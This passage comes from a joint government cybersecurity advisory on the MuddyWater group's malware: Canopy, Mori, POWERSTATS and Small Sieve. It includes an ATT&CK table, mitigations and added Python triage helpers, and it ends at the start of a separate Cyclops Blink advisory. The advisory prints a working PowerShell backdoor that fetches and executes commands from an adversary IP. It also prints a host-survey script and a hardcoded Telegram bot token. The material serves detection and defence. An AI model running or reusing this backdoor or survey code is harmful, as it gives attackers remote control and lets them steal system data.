MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).
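Because the API-name strings are ADD-encrypted with a single byte, a plain strings pass over the DLL will not show them, but the encoded forms can be searched for directly. The Python below is an added triage example, not code from the advisory: it assumes each stored byte is the plaintext byte plus the key (modulo 256), the API list is an analyst's guess, and the blob is constructed.

```python
"""Find ADD-encoded API names in a binary blob (static triage aid).

Added example; the blob is constructed and the API list is an assumption.
"""

ADD_KEY = 0x05  # key stated in the advisory

# Assumption: common Windows networking imports worth searching for. The
# advisory does not list which APIs the sample resolves.
API_NAMES = ("WSAStartup", "getaddrinfo", "socket", "connect", "send", "recv",
             "InternetOpenA", "HttpSendRequestA")


def add_encode(data, key=ADD_KEY):
    """Stored form under the assumed scheme: each byte plus key, modulo 256."""
    return bytes((b + key) & 0xFF for b in data)


def add_decode(data, key=ADD_KEY):
    """Inverse of add_encode(): each byte minus key, modulo 256."""
    return bytes((b - key) & 0xFF for b in data)


def find_encoded_names(blob, key=ADD_KEY, names=API_NAMES):
    """Return sorted (offset, api_name) pairs for every encoded name found in blob."""
    hits = []
    for name in names:
        needle = add_encode(name.encode("ascii"), key)
        pos = blob.find(needle)
        while pos != -1:
            hits.append((pos, name))
            pos = blob.find(needle, pos + 1)
    return sorted(hits)


def recover_key(blob, names=API_NAMES):
    """Try every non-zero key and return (key, hit_count) for the best one.

    Goes beyond the single key in the advisory: if a sample stored
    plaintext minus 5 instead, this would report key 0xFB.
    """
    best = (0, 0)
    for key in range(1, 256):
        count = len(find_encoded_names(blob, key, names))
        if count > best[1]:
            best = (key, count)
    return best


# Constructed blob: filler bytes around three encoded, NUL-separated names.
SAMPLE_BLOB = (b"\x90" * 8
               + add_encode(b"WSAStartup\x00getaddrinfo\x00connect\x00")
               + b"\xcc" * 8)

if __name__ == "__main__":
    print("best key:", recover_key(SAMPLE_BLOB))
    for offset, api in find_encoded_names(SAMPLE_BLOB):
        print(hex(offset), api)
```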

POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools—along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, VirusTotal. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";$ips = "";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % {$ips = $ips + ", " + $_.IPAddress[0]};$S += $ips.substring(1);$S += ";;";$S += $O.OSArchitecture;$S += ";;";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += ";;";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += ";;";$S += $env:UserName;$S += ";;";$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;

Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater, shown below, encrypts its communications with adversary-controlled infrastructure using a single-byte exclusive-OR (XOR) with the key 0x02. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.
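For analysts reviewing proxy or web-gateway captures, the encoding used by the sample's encode and decode functions (Base64 over a single-byte XOR with key 2) can be reversed offline. The following Python is an added example, not code from the advisory; the record fields (ts, client, url, response_body, cookie), the host names and the sample values are constructed assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

XOR_KEY = 0x02  # single-byte key stated in the advisory


def decode_c2(blob, key=XOR_KEY):
    """Reverse the sample's encode(): Base64-decode, XOR each byte, read as UTF-8.

    Returns None when the value is not strict Base64 or does not come out as
    mostly printable text, which is the case for ordinary bodies and cookies.
    """
    try:
        raw = base64.b64decode(blob.strip(), validate=True)
        text = bytes(b ^ key for b in raw).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    if not text:
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable / len(text) >= 0.9 else None


def matches_poll_url(url):
    """True for the request shape in the sample: /index.php with an id parameter."""
    parts = urlsplit(url)
    return parts.path.endswith("/index.php") and "id" in parse_qs(parts.query)


def triage(records):
    """Return decoded tasking (response body) and results (Cookie header)."""
    findings = []
    for rec in records:
        if not matches_poll_url(rec["url"]):
            continue
        tasking = decode_c2(rec.get("response_body", ""))
        result = decode_c2(rec.get("cookie", ""))
        if tasking or result:
            findings.append({"ts": rec["ts"], "client": rec["client"],
                             "tasking": tasking, "result": result})
    return findings


def poll_gaps(records, client):
    """Seconds between successive matching requests from one client, for
    comparison with the 20-second sleep in the sample."""
    times = sorted(r["ts"] for r in records
                   if r["client"] == client and matches_poll_url(r["url"]))
    return [later - earlier for earlier, later in zip(times, times[1:])]


# Constructed records (not real traffic); the host names are placeholders.
POLL = "http://c2.example.invalid/index.php?id=VICTIM-0001"
SAMPLE_RECORDS = [
    {"ts": 1000, "client": "10.0.0.5", "url": POLL,
     "response_body": "dWptY29r", "cookie": ""},
    {"ts": 1001, "client": "10.0.0.5", "url": POLL,
     "response_body": "", "cookie": "am1xdjM="},
    {"ts": 1021, "client": "10.0.0.5", "url": POLL,
     "response_body": "", "cookie": ""},
    {"ts": 1041, "client": "10.0.0.5", "url": POLL,
     "response_body": "", "cookie": ""},
    {"ts": 1005, "client": "10.0.0.9",
     "url": "http://intranet.example.invalid/index.php?id=42",
     "response_body": "<html>ok</html>", "cookie": "sessionid=abc123"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
    print("gaps:", poll_gaps(SAMPLE_RECORDS, "10.0.0.5"))
```

Any Base64 text value will decode to something readable under a one-byte XOR, so the decoded strings are material for analyst review alongside the URL shape and polling interval, not a verdict on their own.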

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}

MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title | ID | Use

Reconnaissance
Gather Victim Identity Information: Email Addresses | T1589.002 | MuddyWater has specifically targeted government agency employees with spearphishing emails.

Resource Development
Acquire Infrastructure: Web Services | T1583.006 | MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool | T1588.002 | MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.

Initial Access
Phishing: Spearphishing Attachment | T1566.001 | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.
Phishing: Spearphishing Link | T1566.002 | MuddyWater has sent targeted spearphishing emails with malicious links.

Execution
Windows Management Instrumentation | T1047 | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell | T1059.001 | MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic | T1059.005 | MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python | T1059.006 | MuddyWater has used developed tools in Python including Out1.
Command and Scripting Interpreter: JavaScript | T1059.007 | MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution | T1203 | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link | T1204.001 | MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File | T1204.002 | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model | T1559.001 | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange | T1559.002 | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.

Persistence
Scheduled Task/Job: Scheduled Task | T1053.005 | MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros | T1137.001 | MuddyWater has used a Word Template, Normal.dotm, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | MuddyWater has added Registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.

Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002 | MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores | T1555 | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers | T1555.003 | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.

Defense Evasion
Obfuscated Files or Information | T1027 | MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography | T1027.003 | MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Delivery | T1027.004 | MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location | T1036.005 | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information | T1140 | MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP | T1218.003 | MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta | T1218.005 | MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 | T1218.011 | MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrails | T1480 | The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools | T1562.001 | MuddyWater can disable the system's local proxy settings.

Credential Access
OS Credential Dumping: LSASS Memory | T1003.001 | MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets | T1003.004 | MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials | T1003.005 | MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files | T1552.001 | MuddyWater has run a tool that steals passwords saved in victim email.

Discovery
System Network Configuration Discovery | T1016 | MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery | T1033 | MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery | T1049 | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery | T1057 | MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery | T1082 | MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery | T1083 | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."
Account Discovery: Domain Account | T1087.002 | MuddyWater has used cmd.exe net user/domain to enumerate domain users.
Software Discovery | T1518 | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery | T1518.001 | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.

Collection
Screen Capture | T1113 | MuddyWater has used malware that can capture screenshots of the victim’s machine.
Archive Collected Data: Archive via Utility | T1560.001 | MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.

Command and Control
Application Layer Protocol: Web Protocols | T1071.001 | MuddyWater has used HTTP for C2 communications, e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy | T1090.002 | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication | T1102.002 | MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels | T1104 | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer | T1105 | MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding | T1132.001 | MuddyWater has used tools to encode C2 communications including Base64 encoding.
Data Encoding: Non-Standard Encoding | T1132.002 | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software | T1219 | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.

Exfiltration
Exfiltration Over C2 Channel | T1041 | MuddyWater has used C2 infrastructure to receive exfiltrated data.

 

Mitigations

Protective Controls and Architecture
  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 
Identity and Access Management
  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 
Phishing Protection
  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 
Vulnerability and Configuration Management
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Prioritize patching known exploited vulnerabilities.
Additional Resources
  • For more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat Overview and Advisories and CNMF's press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:


Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: Gram.app.exe Metadata

Filename | gram_app.exe
Description | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key
Size | 16999598 bytes
MD5 | 15fa3b32539d7453a9a85958b77d4c95
SHA-1 | 11d594f3b3cf8525682f6214acb7b7782056d282
SHA-256 | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054
Compile Time | 2021-09-25 21:57:46 UTC

 

Table 3: Index.exe Metadata

Filename | index.exe
Description | The final PyInstaller-bundled Python 3.9 backdoor
Size | 17263089 bytes
MD5 | 5763530f25ed0ec08fb26a30c04009f1
SHA-1 | 2a6ddf89a8366a262b56a251b00aafaed5321992
SHA-256 | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2
Compile Time | 2021-08-01 04:39:46 UTC

Functionality

Installation

Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData/Roaming directory and is added as a Run key in the registry to enable persistence after reboot.

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift. 
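One way to check an exported Run key for the persistence entry described above, as an added example (not code from the advisory). It assumes the text output of reg query for the HKCU Run key; the sample export, user name and the "Updater" entry are constructed, the install path is the one given in table 6, and the value name SystemTextEncoding comes from table 1.

```python
import re

# Indicators as given in the advisory (table 1, table 6 and the Installation text).
RUN_VALUE_NAMES = {"outlookmicrosift", "systemtextencoding"}
INSTALL_SUFFIX = r"\outlookmicrosift\index.exe"
GUARDRAIL_ARG = "platypus"

# One value line of `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
ENTRY = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")
# Executable (optionally quoted) followed by its arguments.
COMMAND = re.compile(r'^"?(?P<exe>.+?\.exe)"?\s*(?P<args>.*)$', re.IGNORECASE)


def parse_run_key(text):
    """Return (value name, data) pairs from reg query text output."""
    entries = []
    for line in text.splitlines():
        match = ENTRY.match(line)
        if match:
            entries.append((match.group("name"), match.group("data").strip()))
    return entries


def split_command(data):
    """Split a Run value into (executable path, argument list)."""
    match = COMMAND.match(data.strip())
    if not match:
        return data.strip(), []
    return match.group("exe"), match.group("args").split()


def check_entry(name, data):
    """List the advisory indicators that a single Run value matches."""
    exe, args = split_command(data)
    reasons = []
    if name.lower() in RUN_VALUE_NAMES:
        reasons.append("value name listed in advisory")
    if exe.lower().endswith(INSTALL_SUFFIX):
        reasons.append("Small Sieve install path")
    if any(arg.strip('"').lower() == GUARDRAIL_ARG for arg in args):
        reasons.append("Platypus guardrail argument")
    return reasons


def scan(text):
    """Map each suspicious value name to the reasons it was flagged."""
    flagged = {}
    for name, data in parse_run_key(text):
        reasons = check_entry(name, data)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed export for illustration; not taken from a real host.
SAMPLE_EXPORT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    OutlookMicrosift    REG_SZ    C:\Users\alice\AppData\Roaming\OutlookMicrosift\index.exe Platypus
    Updater    REG_SZ    C:\Users\alice\AppData\Roaming\OutlookMicrosift\index.exe
"""

if __name__ == "__main__":
    for value_name, why in scan(SAMPLE_EXPORT).items():
        print(value_name, "->", "; ".join(why))
```

Matching on the path and the argument as well as the value name keeps the check useful if the Run value is renamed.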

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt. 

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field | Value | Description
Chat ID | 2090761833 | This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.
Bot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.
Telegram Token | 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API.

Tasking

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command | Description
delete | This command causes the backdoor to exit; it does not remove persistence.
download url””filename | The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.
change token””newtoken | The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file.
disconnect | The original connection to Telegram is terminated. It is likely used after a change token command is issued.

 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.

Defense Evasion

Anti-Sandbox

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

Communications

Beacon Format

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

Traffic obfuscation

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

 

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

Detection

Table 6 outlines indicators of compromise.
 

Table 6: Indicators of Compromise

Type | Description | Values
Path | Telegram Session Persistence File (Obfuscated) | %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt
Path | Installation path of the Small Sieve binary | %AppData%\OutlookMicrosift\index.exe
Registry value name | Persistence Registry Key pointing to index.exe with a “Platypus” argument | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift

String Recover Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at Cybersecurity_Requests@nsa.gov. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions
  • February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-054A: New Sandworm Malware Cyclops Blink Replaces VPNFilter

US-CERT Security Alerts - Wed, 02/23/2022 - 07:00
Original release date: February 23, 2022
Summary

The Sandworm actor, which the United Kingdom and the United States have previously attributed to the Russian GRU, has replaced the exposed VPNFilter malware with a new more advanced framework.

The United Kingdom's (UK) National Cyber Security Centre (NCSC), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) in the U.S. have identified that the actor known as Sandworm or Voodoo Bear is using a new malware, referred to here as Cyclops Blink. The NCSC, CISA, and the FBI have previously attributed the Sandworm actor to the Russian General Staff Main Intelligence Directorate’s (GRU’s) Main Centre for Special Technologies (GTsST). The malicious cyber activity below has previously been attributed to Sandworm:

Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices.

This advisory summarizes the VPNFilter malware it replaces, and provides more detail on Cyclops Blink, as well as the associated tactics, techniques and procedures (TTPs) used by Sandworm. An NCSC malware analysis report on Cyclops Blink is also available.

It also provides mitigation measures to help organizations defend against malware.

Technical Details

VPNFilter

The malware was first exposed in 2018

A series of articles published by Cisco Talos in 2018 describes VPNFilter and its modules in detail. VPNFilter was deployed in stages, with most functionality in the third-stage modules. These modules enabled traffic manipulation, destruction of the infected host device, and likely enabled downstream devices to be exploited. They also allowed monitoring of Modbus SCADA protocols, which appears to be an ongoing requirement for Sandworm, as also seen in their previous attacks against ICS networks.

VPNFilter targeting was widespread and appeared indiscriminate, with some exceptions: Cisco Talos reported an increase of victims in Ukraine in May 2018. Sandworm also deployed VPNFilter against targets in the Republic of Korea before the 2018 Winter Olympics. 

In May 2018, Cisco Talos published the blog that exposed VPNFilter and the U.S. Department of Justice linked the activity to Sandworm and announced efforts to disrupt the botnet.

Activity since its exposure 

A Trend Micro blog in January 2021 detailed residual VPNFilter infections and provided data showing that, although requests to a known C2 domain had fallen, more than a third of the original number of first-stage infections remained.

Sandworm has since shown limited interest in existing VPNFilter footholds, instead preferring to retool.

Cyclops Blink

Active since 2019

The NCSC, CISA, the FBI, and NSA, along with industry partners, have now identified a large-scale modular malware framework (T1129) which is targeting network devices. The new malware is referred to here as Cyclops Blink and has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread.

The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

Note: Only WatchGuard devices that were reconfigured from the manufacturer default settings to open remote management interfaces to external access could be infected.

Malware overview 

The malware itself is sophisticated and modular with basic core functionality to beacon (T1132.002) device information back to a server and enable files to be downloaded and executed. There is also functionality to add new modules while the malware is running, which allows Sandworm to implement additional capability as required.

The NCSC has published a malware analysis report on Cyclops Blink which provides more detail about the malware.

Post exploitation 

Post exploitation, Cyclops Blink is generally deployed as part of a firmware ‘update’ (T1542.001). This achieves persistence when the device is rebooted and makes remediation harder.

